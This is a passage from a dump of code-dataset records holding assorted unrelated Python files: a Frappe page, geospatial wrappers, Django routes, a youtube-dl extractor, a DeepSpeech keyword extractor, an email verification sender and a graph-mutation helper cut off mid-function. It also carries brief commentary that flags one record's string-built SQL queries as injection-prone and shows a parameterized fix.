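print(collector.calls)  # ['os.path.join']
```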
+{"seq_id":"177886178","text":"from __future__ import unicode_literals\r\nimport frappe\r\n\r\ndef get_context(context):\r\n\t#body\r\n\t#---------------\r\n\t# -->Background-Image\r\n\tcontext.bodyimage = False\r\n\tif frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'bg_select' AND doctype = 'Body Settings'\", as_dict=True)[0].value == \"Image\":\r\n\t\tcontext.bodyimage = True\r\n\t\tcontext.bodyimagesource = frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'bg_img' AND doctype = 'Body Settings'\", as_dict=True)\r\n\t\t\r\n\t# -->Background-Color\r\n\tcontext.bodycolor = False\r\n\tif frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'bg_select' AND doctype = 'Body Settings'\", as_dict=True)[0].value == \"Color\":\r\n\t\tcontext.bodycolor = True\r\n\t\tcontext.bodycolorcode = frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'bg_color' AND doctype = 'Body Settings'\", as_dict=True)\r\n\t\t\r\n\t#navbar\r\n\t#---------------------\r\n\tcontext.navbar = True\r\n\tcontext.nav_bg_color = frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'nav_bg_color' AND doctype = 'Navbar'\", as_dict=True)[0].value\r\n\tcontext.nav_txt_color = frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'nav_txt_color' AND doctype = 'Navbar'\", as_dict=True)[0].value\r\n\tcontext.navlinks = frappe.db.sql(\"SELECT title, link FROM `tabNavbar Item` WHERE parent = 'Navbar' ORDER BY idx ASC\", as_dict=True)\r\n\t\r\n\t#footer\r\n\t#-------------------\r\n\tcontext.footer = True\r\n\tcontext.footer_bg_color = frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'footer_bg_color' AND doctype = 'PageMaster Footer'\", as_dict=True)[0].value\r\n\tcontext.footer_txt_color = frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'footer_txt_color' AND doctype = 'PageMaster Footer'\", as_dict=True)[0].value\r\n\tcontext.txt = frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'txt' AND doctype = 'PageMaster Footer'\", as_dict=True)[0].value\r\n\tcontext.link_title = frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'link_title' AND doctype = 'PageMaster Footer'\", as_dict=True)[0].value\r\n\tcontext.link = frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'link' AND doctype = 'PageMaster Footer'\", as_dict=True)[0].value\r\n\t\t\r\n\t#timeline\r\n\t#-----------------------\r\n\tcontext.timeline = False\r\n\tif frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'incl_timeline' AND doctype = 'About Us'\", as_dict=True)[0].value == \"1\":\r\n\t\tcontext.timeline = True\r\n\t\ttimeline_parent = frappe.db.sql(\"SELECT value FROM `tabSingles`WHERE doctype = 'About Us' AND field = 'timeline'\", as_dict=True)[0].value\r\n\t\tcontext.timeline_intro = frappe.db.sql(\"SELECT timeline_intro FROM `tabTimeline Set` WHERE title = '\"+timeline_parent+\"'\", as_dict=True)[0].timeline_intro\r\n\t\tcontext.timelines = frappe.db.sql(\"SELECT year, highlight, align FROM `tabTimeline` WHERE parent = '\"+timeline_parent+\"' ORDER BY idx ASC\", as_dict=True)\r\n\t\t\r\n\t#cards\r\n\t#--------------------------\r\n\tcontext.card = False\r\n\tif frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'incl_cards' AND doctype = 'About Us'\", as_dict=True)[0].value == \"1\":\r\n\t\tcontext.card = True\r\n\t\tcard_parent = frappe.db.sql(\"SELECT value FROM `tabSingles`WHERE doctype = 'About Us' AND field = 'cards'\", as_dict=True)[0].value\r\n\t\tcontext.cards = frappe.db.sql(\"SELECT img_or_fa, card_fa, card_fa_size, link_linkedin, card_img, title, 
link_twitter, subtitle_1, subtitle_2, btn_link, link_facebook, btn_title FROM `tabPage Cards` WHERE parent = '\"+card_parent+\"' ORDER BY idx ASC\", as_dict=True)\r\n\t\t\r\n\t#introduction\r\n\tcontext.intro = frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'introduction' AND doctype = 'About Us'\", as_dict=True)[0].value","sub_path":"pagemaster/www/aboutus.py","file_name":"aboutus.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
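The Timeline and Cards queries in this record interpolate `timeline_parent` and `card_parent` directly into the SQL string, which is injection-prone. A safer equivalent is sketched below, on the assumption that `frappe.db.sql` is given `%s` placeholders plus a values tuple (its standard parameterized form); the variable names mirror the record:

```python
import frappe

# fetch the parent key the record reads from tabSingles
timeline_parent = frappe.db.sql(
    "SELECT value FROM tabSingles WHERE doctype = 'About Us' AND field = 'timeline'",
    as_dict=True,
)[0].value

# parameterized versions of the concatenated queries in the record
timeline_intro = frappe.db.sql(
    "SELECT timeline_intro FROM `tabTimeline Set` WHERE title = %s",
    (timeline_parent,),
    as_dict=True,
)[0].timeline_intro

timelines = frappe.db.sql(
    "SELECT year, highlight, align FROM `tabTimeline` WHERE parent = %s ORDER BY idx ASC",
    (timeline_parent,),
    as_dict=True,
)
```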
+{"seq_id":"547430554","text":"# Copyright (C) 2019-2020 Zilliz. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n__all__ = [\n \"ST_Point\",\n \"ST_Intersection\",\n \"ST_IsValid\",\n \"ST_PrecisionReduce\",\n \"ST_Equals\",\n \"ST_Touches\",\n \"ST_Overlaps\",\n \"ST_Crosses\",\n \"ST_IsSimple\",\n \"ST_GeometryType\",\n \"ST_MakeValid\",\n \"ST_SimplifyPreserveTopology\",\n \"ST_PolygonFromEnvelope\",\n \"ST_Contains\",\n \"ST_Intersects\",\n \"ST_Within\",\n \"ST_Distance\",\n \"ST_Area\",\n \"ST_Centroid\",\n \"ST_Length\",\n \"ST_HausdorffDistance\",\n \"ST_ConvexHull\",\n \"ST_NPoints\",\n \"ST_Envelope\",\n \"ST_Buffer\",\n \"ST_Union_Aggr\",\n \"ST_Envelope_Aggr\",\n \"ST_Transform\",\n \"ST_CurveToLine\",\n \"ST_GeomFromGeoJSON\",\n \"ST_GeomFromText\",\n \"point_map\",\n \"point_map_wkt\",\n \"heat_map\",\n \"heat_map_wkt\",\n \"choropleth_map\",\n \"coordinate_projection\",\n]\n\n\n\nimport pyarrow as pa\nfrom . import arctern_core_\n\ndef ST_Point(x, y):\n arr_x = pa.array(x, type='double')\n arr_y = pa.array(y, type='double')\n rs = arctern_core_.ST_Point(arr_x, arr_y)\n return rs.to_pandas()\n\ndef ST_GeomFromGeoJSON(json):\n geo = pa.array(json, type='string')\n rs = arctern_core_.ST_GeomFromGeoJSON(geo)\n return rs.to_pandas()\n\ndef ST_GeomFromText(text):\n geo = pa.array(text, type='string')\n rs = arctern_core_.ST_GeomFromText(geo)\n return rs.to_pandas()\n\ndef ST_Intersection(left, right):\n arr_left = pa.array(left, type='string')\n arr_right = pa.array(right, type='string')\n rs = arctern_core_.ST_Intersection(arr_left, arr_right)\n return rs.to_pandas()\n\ndef ST_IsValid(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_IsValid(arr_geos)\n return rs.to_pandas()\n\ndef ST_PrecisionReduce(geos, precision):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_PrecisionReduce(arr_geos, precision)\n return rs.to_pandas()\n\ndef ST_Equals(left, right):\n arr_left = pa.array(left, type='string')\n arr_right = pa.array(right, type='string')\n rs = arctern_core_.ST_Equals(arr_left, arr_right)\n return rs.to_pandas()\n\ndef ST_Touches(left, right):\n arr_left = pa.array(left, type='string')\n arr_right = pa.array(right, type='string')\n rs = arctern_core_.ST_Touches(arr_left, arr_right)\n return rs.to_pandas()\n\ndef ST_Overlaps(left, right):\n arr_left = pa.array(left, type='string')\n arr_right = pa.array(right, type='string')\n rs = arctern_core_.ST_Overlaps(arr_left, arr_right)\n return rs.to_pandas()\n\ndef ST_Crosses(left, right):\n arr_left = pa.array(left, type='string')\n arr_right = pa.array(right, type='string')\n rs = arctern_core_.ST_Crosses(arr_left, arr_right)\n return rs.to_pandas()\n\ndef ST_IsSimple(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_IsSimple(arr_geos)\n return rs.to_pandas()\n\ndef ST_GeometryType(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_GeometryType(arr_geos)\n return rs.to_pandas()\n\ndef ST_MakeValid(geos):\n arr_geos = 
pa.array(geos, type='string')\n rs = arctern_core_.ST_MakeValid(arr_geos)\n return rs.to_pandas()\n\ndef ST_SimplifyPreserveTopology(geos, distance_tolerance):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_SimplifyPreserveTopology(arr_geos, distance_tolerance)\n return rs.to_pandas()\n\ndef ST_PolygonFromEnvelope(min_x, min_y, max_x, max_y):\n arr_min_x = pa.array(min_x, type='double')\n arr_min_y = pa.array(min_y, type='double')\n arr_max_x = pa.array(max_x, type='double')\n arr_max_y = pa.array(max_y, type='double')\n rs = arctern_core_.ST_PolygonFromEnvelope(arr_min_x, arr_min_y, arr_max_x, arr_max_y)\n return rs.to_pandas()\n\ndef ST_Contains(left, right):\n arr_left = pa.array(left, type='string')\n arr_right = pa.array(right, type='string')\n rs = arctern_core_.ST_Contains(arr_left, arr_right)\n return rs.to_pandas()\n\ndef ST_Intersects(left, right):\n arr_left = pa.array(left, type='string')\n arr_right = pa.array(right, type='string')\n rs = arctern_core_.ST_Intersects(arr_left, arr_right)\n return rs.to_pandas()\n\ndef ST_Within(left, right):\n arr_left = pa.array(left, type='string')\n arr_right = pa.array(right, type='string')\n rs = arctern_core_.ST_Within(arr_left, arr_right)\n return rs.to_pandas()\n\ndef ST_Distance(left, right):\n arr_left = pa.array(left, type='string')\n arr_right = pa.array(right, type='string')\n rs = arctern_core_.ST_Distance(arr_left, arr_right)\n return rs.to_pandas()\n\ndef ST_Area(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_Area(arr_geos)\n return rs.to_pandas()\n\ndef ST_Centroid(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_Centroid(arr_geos)\n return rs.to_pandas()\n\ndef ST_Length(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_Length(arr_geos)\n return rs.to_pandas()\n\ndef ST_HausdorffDistance(geo1, geo2):\n arr1 = pa.array(geo1, type='string')\n arr2 = pa.array(geo2, type='string')\n rs = arctern_core_.ST_HausdorffDistance(arr1, arr2)\n return rs.to_pandas()\n\ndef ST_ConvexHull(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_ConvexHull(arr_geos)\n return rs.to_pandas()\n\ndef ST_NPoints(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_NPoints(arr_geos)\n return rs.to_pandas()\n\ndef ST_Envelope(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_Envelope(arr_geos)\n return rs.to_pandas()\n\ndef ST_Buffer(geos, distance):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_Buffer(arr_geos, distance)\n return rs.to_pandas()\n\ndef ST_Union_Aggr(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_Union_Aggr(arr_geos)\n return str(rs[0])\n\ndef ST_Envelope_Aggr(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_Envelope_Aggr(arr_geos)\n return str(rs[0])\n\ndef ST_Transform(geos, src, dst):\n arr_geos = pa.array(geos, type='string')\n src = bytes(src, encoding=\"utf8\")\n dst = bytes(dst, encoding=\"utf8\")\n\n rs = arctern_core_.ST_Transform(arr_geos, src, dst)\n return rs.to_pandas()\n\ndef ST_CurveToLine(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_CurveToLine(arr_geos)\n return rs.to_pandas()\n\n\ndef point_map(xs, ys, conf):\n arr_x = pa.array(xs, type='uint32')\n arr_y = pa.array(ys, type='uint32')\n rs = arctern_core_.point_map(arr_x, arr_y, conf)\n return rs.buffers()[1].to_pybytes().hex()\n\ndef point_map_wkt(points, conf):\n array_points = pa.array(points, 
type='string')\n rs = arctern_core_.point_map_wkt(array_points, conf)\n return rs.buffers()[1].to_pybytes().hex()\n\ndef heat_map(x_data, y_data, c_data, conf):\n arr_x = pa.array(x_data, type='uint32')\n arr_y = pa.array(y_data, type='uint32')\n arr_c = pa.array(c_data, type='uint32')\n rs = arctern_core_.heat_map(arr_x, arr_y, arr_c, conf)\n return rs.buffers()[1].to_pybytes().hex()\n\n\ndef heat_map_wkt(points, c_data, conf):\n array_points = pa.array(points, type='string')\n\n if isinstance(c_data[0], float):\n arr_c = pa.array(c_data, type='double')\n else:\n arr_c = pa.array(c_data, type='int64')\n\n rs = arctern_core_.heat_map_wkt(array_points, arr_c, conf)\n return rs.buffers()[1].to_pybytes().hex()\n\ndef choropleth_map(wkt_data, count_data, conf):\n arr_wkt = pa.array(wkt_data, type='string')\n if isinstance(count_data[0], float):\n arr_count = pa.array(count_data, type='double')\n else:\n arr_count = pa.array(count_data, type='int64')\n rs = arctern_core_.choropleth_map(arr_wkt, arr_count, conf)\n return rs.buffers()[1].to_pybytes().hex()\n\ndef coordinate_projection(geos, top_left, bottom_right, height, width):\n arr_geos = pa.array(geos, type='string')\n src_rs1 = bytes(top_left, encoding=\"utf8\")\n dst_rs1 = bytes(bottom_right, encoding=\"utf8\")\n rs = arctern_core_.coordinate_projection(arr_geos, src_rs1, dst_rs1, height, width)\n return rs.to_pandas()\n","sub_path":"python/arctern/_wrapper_func.py","file_name":"_wrapper_func.py","file_ext":"py","file_size_in_byte":8641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
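All of the wrappers in this record convert plain Python sequences to Arrow arrays and hand them to the compiled `arctern_core_` extension. A hypothetical usage sketch follows; it assumes arctern and its extension are installed, that the package re-exports these functions at the top level, and that the geometry functions accept WKT strings, as the `type='string'` arrays suggest. The expected outputs are noted under those assumptions:

```python
# Hypothetical usage of the arctern wrappers above.
from arctern import ST_IsValid, ST_Area, ST_NPoints

wkt = [
    "POLYGON ((0 0, 4 0, 4 4, 0 4, 0 0))",
    "POLYGON ((0 0, 1 0, 1 1, 0 1, 0 0))",
]
print(ST_IsValid(wkt))   # expect [True, True]
print(ST_Area(wkt))      # expect [16.0, 1.0]
print(ST_NPoints(wkt))   # expect [5, 5] (closing vertex counted)
```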
+{"seq_id":"601118258","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^team$', views.team, name='team'),\n url(r'^quiz$', views.quiz, name='quiz'),\n url(r'^vacancies$', views.vacancies, name='vacancies'),\n url(r'^projects$', views.projects, name='projects'),\n\n url(r\"^quiz_start\", views.quiz_start, name='quiz_start'),\n url(r\"^quiz_process\", views.quiz_process, name='quiz_process'),\n url(r\"^quiz_finish\", views.quiz_finish, name='quiz_finish'),\n url(r'^useful_links', views.useful_links, name='useful_links'),\n url(r'^contact', views.contact, name='contact'),\n]\n","sub_path":"quiz/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"74856718","text":"# File: constants.py\n# ------------------\n# Default values for hyperparameters\n\n# Utilities\nLOG_FOLDER = './logging'\nMODEL_FOLDER = './models'\nDATA_FOLDER = './data'\nSAMPLE_FOLDER = './samples'\nPLOT_FOLDER = './plots'\nPLOT_EPOCH = 59\nIMG_SIZES = [64, 128, 256]\nNUM_CAPTIONS = 10\nSEQ_LENGTH = 17\n\n# Training hyperparameters\nSAVE_EVERY = 10\nSTART_EPOCH = 0\nEPOCHS = 600\nNUM_WORKERS = 8\nBATCH_SIZE = 48\nINCEPTION_LR = 0.002\nDAMSM_LR = 0.0002\nCAPTION_LR = 0.001\nGEN_LR = 0.0002\nDISC_LR = 0.0002\nGAMMA_1 = 4.0\nGAMMA_2 = 5.0\nGAMMA_3 = 10.0\nLAMBDA = 5.0\n\n# Experiment Hyperparameters\nDAMSM_NAME = 'damsm_trial_2'\nCAPTION_NAME = 'vanilla_caption'\nCAPTION_LOAD_EPOCH = -1\nDAMSM_LOAD_EPOCH = 469\nINCEPTION_MODEL_PATH = 'inception'\nINCEPTION_LOAD_EPOCH = 71\nLOAD_EPOCH = -1\nSEED = 0\n\n# LSTM Encoder Hyperparameters\n# Fix these\nEMBED_SIZE = 300\nDROPOUT_PROB = 0.5\nNUM_ENCODER_LAYERS = 3\nENCODING_SIZE = 256\nWEIGHT_RANGE = 0.1\nCA_SIZE = 100 # I set this myself\nIN_CHANNELS = 32\nZ_SIZE = 100\nDISCRIMINATOR_FILTERS = 64\nCAPTION_EMBEDDING_SIZE = 256\nCAPTION_HIDDEN_SIZE = 512\nCAPTION_NUM_LAYERS = 1\n","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"1917563","text":"# coding: utf-8\nfrom __future__ import unicode_literals\n\nfrom .common import InfoExtractor\nfrom ..utils import (\n parse_iso8601,\n unescapeHTML,\n)\n\n\nclass PeriscopeIE(InfoExtractor):\n _VALID_URL = r'https?://(?:www\\.)?periscope\\.tv/w/(?P[^/?#]+)'\n _TEST = {\n 'url': 'https://www.periscope.tv/w/aJUQnjY3MjA3ODF8NTYxMDIyMDl2zCg2pECBgwTqRpQuQD352EMPTKQjT4uqlM3cgWFA-g==',\n 'md5': '65b57957972e503fcbbaeed8f4fa04ca',\n 'info_dict': {\n 'id': '56102209',\n 'ext': 'mp4',\n 'title': 'Bec Boop - 🚠✈️🇬🇧 Fly above #London in Emirates Air Line cable car at night 🇬🇧✈️🚠 #BoopScope 🎀💗',\n 'timestamp': 1438978559,\n 'upload_date': '20150807',\n 'uploader': 'Bec Boop',\n 'uploader_id': '1465763',\n },\n 'skip': 'Expires in 24 hours',\n }\n\n def _call_api(self, method, token):\n return self._download_json(\n 'https://api.periscope.tv/api/v2/%s?token=%s' % (method, token), token)\n\n def _real_extract(self, url):\n token = self._match_id(url)\n\n replay = self._call_api('getAccessPublic', token)\n video_url = replay['replay_url']\n\n broadcast_data = self._call_api('getBroadcastPublic', token)\n broadcast = broadcast_data['broadcast']\n status = broadcast['status']\n\n uploader = broadcast.get('user_display_name') or broadcast_data.get('user', {}).get('display_name')\n uploader_id = broadcast.get('user_id') or broadcast_data.get('user', {}).get('id')\n\n title = '%s - %s' % (uploader, status) if uploader else status\n timestamp = parse_iso8601(broadcast.get('created_at'))\n\n thumbnails = [{\n 'url': broadcast[image],\n } for image in ('image_url', 'image_url_small') if broadcast.get(image)]\n\n return {\n 'id': broadcast.get('id') or token,\n 'url': video_url,\n 'ext': 'mp4',\n 'protocol': 'm3u8_native',\n 'title': title,\n 'timestamp': timestamp,\n 'uploader': uploader,\n 'uploader_id': uploader_id,\n 'thumbnails': thumbnails,\n }\n","sub_path":"youtube_dl/extractor/periscope.py","file_name":"periscope.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"636288960","text":"from deepspeech import Model\nimport soundfile as sf\nimport numpy as np\n\nimport os\nimport wave\n\n\ndef read_wav_file(filename):\n ''' \n Reads frame rate, number of frames, and buffer from WAV file.\n Must be already resampled (16kHz, mono) \n '''\n with wave.open(filename, 'rb') as w:\n rate = w.getframerate()\n frames = w.getnframes()\n buffer = w.readframes(frames)\n\n audio = np.frombuffer(buffer, dtype=np.int16)\n\n return audio, buffer, rate\n \n\ndef get_model():\n '''\n Load DeepSpeech speech-to-text model.\n '''\n model_file_path = \"models/deepspeech-0.9.3-models.pbmm\"\n lm_file_path = \"models/deepspeech-0.9.3-models.scorer\"\n\n beam_width = 100\n lm_alpha = 0.93\n lm_beta = 1.18\n\n model = Model(model_file_path)\n model.enableExternalScorer(lm_file_path)\n\n model.setScorerAlphaBeta(lm_alpha, lm_beta)\n model.setBeamWidth(beam_width)\n \n return model \n\n\ndef transcribe_batch(audio):\n ''' Get letters and timestamps '''\n model = get_model()\n return model.sttWithMetadata(audio).transcripts[0].tokens\n\n\ndef extract_keywords(metadata):\n ''' Combine letters and timestamps to form words '''\n word = ''\n transcript = []\n start = metadata[0].start_time\n \n for i, token in enumerate(metadata):\n letter = token.text\n\n if letter == ' ' or i == len(metadata):\n last_letter = metadata[i-1].start_time\n transcript.append((word, start, last_letter))\n start = token.start_time \n word = ''\n else:\n word += letter\n \n return transcript\n\n\ndef save_keywords(transcript, keyword, audio):\n ''' Save utterances in individual .wav files '''\n\n # create directory to store keywords if it doesn't exist\n if not os.path.exists(keyword):\n os.makedirs(keyword)\n \n sample_rate = 16000\n\n num_total = len(os.listdir(keyword))\n saved = 0\n\n for entry in transcript:\n word = entry[0] # keyword\n\n # save only desired keyword\n if word == keyword:\n # get start and end times\n start = int(entry[1] * sample_rate)\n end = int(entry[2] * sample_rate)\n\n # save wav file\n save_file = f\"{word}_{num_total+saved}.wav\"\n out_file_path = os.path.join(keyword, save_file)\n sf.write(out_file_path, audio[start:end], sample_rate)\n\n saved += 1\n\n return saved\n\n\ndef inspect_keywords(transcript):\n ''' Returns unique words and their frequencies. '''\n\n words = []\n\n for entry in transcript:\n word = entry[0] # keyword\n words.append(word)\n\n u_words, counts = np.unique(words, return_counts=True)\n\n word_counts = list(zip(u_words, counts))\n\n sorted_counts = sorted(word_counts, key=lambda x: x[1])\n \n return sorted_counts\n\n\ndef extract(filename, keyword):\n '''\n Extracts keywords from audio file,\n\n filename: Path to resampled audio file \n keyword: Desired keyword to collect\n '''\n print(f\"Extracting '{keyword}' utterances from {filename}.\")\n \n # time series, number of samples, sampling rate \n audio, buffer, rate = read_wav_file(filename)\n\n # tokens \n transcribed_metadata = transcribe_batch(audio=audio)\n\n # list of words with start, end times \n transcript = extract_keywords(transcribed_metadata)\n\n num_saved = save_keywords(transcript=transcript, keyword=keyword, \n audio=audio)\n\n print(f\"Utterances saved: {num_saved}\")\n\n return num_saved \n ","sub_path":"extract_words.py","file_name":"extract_words.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"549474965","text":"gou_wu_che = {}\nshnag_pin_info = {\n 101: {'name': '倚天剑', 'price': 10000},\n 102: {'name': '屠龙刀', 'price': 10000},\n 103: {'name': '九阳神功', 'price': 10000},\n 104: {'name': '九阴白骨爪', 'price': 9999},\n 105: {'name': '乾坤大挪移', 'price': 8888},\n 106: {'name': '七伤拳', 'price': 7777}\n}\ndef shopping():\n while True:\n print('*'*12,'\\n','商店','\\n','*'*12,'\\n','按1购买\\n按2结算','\\n','*'*12,sep='')\n\n key=int(input(':'))\n\n if key==1:\n show(shnag_pin_info)\n buying(gou_wu_che, shnag_pin_info)\n elif key==2:\n print('*'*12,'\\n','购物车','\\n','*'*12,sep='')\n\n show_gou_wu_che()\n\n return paying()\ndef paying():\n money = float(input('请输入金额:'))\n sum = 0\n for key in gou_wu_che:\n sum += float(gou_wu_che[key][0]) * float(gou_wu_che[key][1])\n if money > sum:\n print('应找回%.1f' % (money - sum))\n return 0\n else:\n print('金额不足')\n return 0\ndef show_gou_wu_che():\n for key in gou_wu_che:\n print(key, end=' ')\n for i in gou_wu_che[key]:\n print(i, end=' ')\n print()\ndef buying(gou_wu_che, shnag_pin_info):\n count = int(input('请输入商品编号'))\n if count not in shnag_pin_info:\n print('商品不存在')\n else:\n if count in gou_wu_che:\n gou_wu_che[count][0] += 1\n else:\n list01 = []\n list01.append(1)\n list01.append(shnag_pin_info[count]['price'])\n gou_wu_che[count] = list01\n print('添加到购物车')\ndef show(shnag_pin_info):\n for k, v in shnag_pin_info.items():\n print(k, end=' ')\n for i in v.values():\n print(i, end=' ')\n print()\nshopping()","sub_path":"mounth001/test01/home01.py","file_name":"home01.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"50439436","text":"import datetime\nimport smtplib\nfrom email.mime.text import MIMEText\nimport random\n\nfrom ResHub import settings\nfrom django.core.cache import cache\nimport redis\n\nfrom ResHub.redispool import r\n\n\ndef send_email(receive):\n msg_from = settings.FROM_EMAIL\n pwd = settings.EMAIL_PASSWORD\n msg_to = receive\n\n code = get_code()\n subject = 'Reshub'\n content = '【ResHub】验证码:' + str(code)+',您正在注册成为新用户,感谢您的支持!'\n message = MIMEText(content)\n message['Subject'] = subject\n message['From'] = msg_from\n message['To'] = msg_to\n\n s = smtplib.SMTP_SSL(\"smtp.qq.com\", 465) # 邮件服务器及端口号\n try:\n s.login(msg_from, pwd)\n s.sendmail(msg_from, msg_to, message.as_string())\n s.quit()\n r.set(msg_to, code, 3600)\n return True, code\n except Exception:\n s.quit()\n return False, code\n\n\ndef get_code():\n return random.randint(111111, 999999)\n","sub_path":"ResHub/sendMail.py","file_name":"sendMail.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"508521842","text":"import sys\nsys.path.insert(0, './src/')\n\nfrom run_protein import run_protein_expt, get_dataset\nfrom GraphMutator_helper import *\n\nimport numpy as np\nimport os\nimport random\nimport tensorflow as tf\nimport time\nimport pdb\nimport argparse\n\nfrom collections import defaultdict\n\nsuccess_flag = 0\n\nclass Mutator(object):\n\n def __init__(self, command_string):\n pass\n #########################################################################################\n # This function performs the mutation of changing the direction by randomly choosing #\n # a value for theta and phi. The range of the values are defined by the ones from the #\n # slide. #\n #########################################################################################\n \n def n_directions(self, old_string):\n print(\"Changing directions\")\n command_string_cpy = old_string\n cmd_split = old_string.split(' ')\n \n if '--feature_type' in cmd_split:\n ft_ix = cmd_split.index('--feature_type')\n cmd_split[ft_ix+1] = str(0)\n command_string = ' '.join(cmd_split)\n else:\n command_string= old_string + \" --feature_type \" + str(0)\n\n if '--theta' in cmd_split:\n theta_ix = cmd_split.index('--theta')\n cmd_split[theta_ix+1] = str(int(np.random.uniform(1,2*np.pi+1)))\n command_string = ' '.join(cmd_split)\n else:\n theta = int(np.random.uniform(1,2*np.pi+1))\n command_string= old_string + \" --theta \" + str(theta)\n \n if '--phi' in cmd_split:\n phi_ix = cmd_split.index('--phi')\n cmd_split[phi_ix+1] = str(int(np.random.uniform(1,np.pi+1)))\n command_string = ' '.join(cmd_split)\n else:\n phi = int (np.random.uniform(1,np.pi+1))\n command_string= old_string + \" --phi \" + str(phi)\n\n success_flag = 1\n return old_string, command_string, success_flag, None\n\n #########################################################################################\n # This function performs the mutation of changing the value of K by randomly choosing #\n # a value from the array. #\n #########################################################################################\n\n def n_neighbours(self, old_string):\n print(\"Changing K value for knn graph.\")\n command_string_cpy = old_string\n cmd_split = old_string.split(' ')\n k = [2,3,6,8] #Example of different values of K.\n \n if '--K' in cmd_split:\n k_ix = cmd_split.index('--K')\n cmd_split[k_ix+1] = str(k[np.random.randint(4)])\n command_string = ' '.join(cmd_split)\n else:\n k_mutated = k[np.random.randint(4)]\n command_string= old_string + \" --K \" + str(k_mutated)\n success_flag = 1\n return old_string, command_string, success_flag, None\n\n #########################################################################################\n # This function performs the mutation of randomly performing an augmentation operation. #\n # This can be either dropout, flip, rotate, any 2 or all 3. 
#\n #########################################################################################\n\n def agg_augment(self, old_string):\n print(\"Performing Augmentation\")\n augment_selector = np.random.choice(2,3)\n cmd_split = old_string.split(' ')\n \n if np.array_equal(augment_selector,[0,0,0]):\n print (\"No Augmentations\")\n success_flag = 1\n \n if augment_selector[0]:\n #add dropout \n print (\"Adding dropout\")\n dropout_amnt = round(np.random.uniform(0,1),2)\n cmd_split = modify_cmd_list(cmd_split, '--dropout', str(dropout_amnt))\n success_flag = 1\n \n if augment_selector[1]:\n #add rotate \n print (\"Adding Rotation\")\n rotate_intesity = np.random.randint(-15,15)\n cmd_split = modify_cmd_list(cmd_split, '--rotate', str(rotate_intesity))\n success_flag = 1\n \n if augment_selector[2]:\n #add flip\n print (\"Adding flip\")\n flip_flag = np.random.randint(2)\n cmd_split = modify_cmd_list(cmd_split, '--flip', str(flip_flag))\n success_flag = 1\n command_string = ' '.join(cmd_split)\n \n return old_string, command_string, success_flag, None\n\n def regularization_mutation(self, old_string):\n \n print(\"Adding Regularization.\")\n reg_selector = np.random.choice(2,2)\n cmd_split = old_string.split(' ')\n \n if np.array_equal(reg_selector,[0,0]):\n print (\"No Regularization added.\")\n success_flag = 0\n \n if reg_selector[0]:\n print(\"Changing L1 regularization\")\n if '--l1' in cmd_split:\n ix = cmd_split.index('--l1')\n old_l1 = cmd_split[ix+1]\n old_l1 = float(old_l1)\n if old_l1 == 0.0:\n new_l1 = np.random.uniform(0,0.001)\n else:\n new_l1 = np.random.uniform(old_l1*0.5,2*old_l1)\n print('Old L1 = %0.6f'%old_l1)\n print('New L1 = %0.6f'%new_l1)\n cmd_split[ix+1] = str(new_l1)\n else:\n cmd_split.append('--l1')\n cmd_split.append(str(round(np.random.uniform(0,0.001),4)))\n success_flag = 1\n \n if reg_selector[1]:\n print(\"Changing L2 